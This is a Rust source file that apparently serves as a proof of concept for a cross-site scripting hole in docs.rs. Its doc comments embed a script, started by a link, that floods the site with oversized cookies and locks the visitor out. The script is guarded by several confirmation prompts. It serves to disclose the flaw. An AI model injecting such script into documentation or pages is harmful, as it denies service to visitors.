1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
//! 🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥 //! //! This crate demonstrates an XSS vulnerability of docs.rs. To test, click the link below. //! In order to access docs.rs afterward, you will need to clear cookies. //! //! 🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥 //! <script> //! function bootstrap() { //! const doc1 = 'This is a demonstration of a security vulnerability (XSS). Click CANCEL to abort at any time.'; //! const doc2 = 'WARNING: If you proceed, you will not be able to access docs.rs. CLICK CANCEL if you do not wish this to happen.'; //! const doc3 = 'WARNING: To access docs.rs after proceeding, you will need to clear your browser cookies.'; //! if (!confirm(doc1) || !confirm(doc2) || !confirm(doc3)) { //! return; //! } //! if (prompt('Type "I understand what I need to do" to continue:') !== "I understand what I need to do") { return; } //! let z = 'z'; //! for (let i = 0; i < 4000; i++) { //! z = z + 'z'; //! } //! function setCookie(name) { //! document.cookie = name + '=' + z + '; expires=Fri, 31 Dec 9999 23:59:59 GMT; Path=/'; //! } //! ['a','b','c','d','e','f','g','h'].forEach(setCookie); //! window.location.reload(); //! } //! </script> #[doc = "<a href=# onClick=bootstrap()>Click here</a> for a demo of a security vulnerability. WARNING: you will need to reset cookies after doing this."] pub fn builder() { }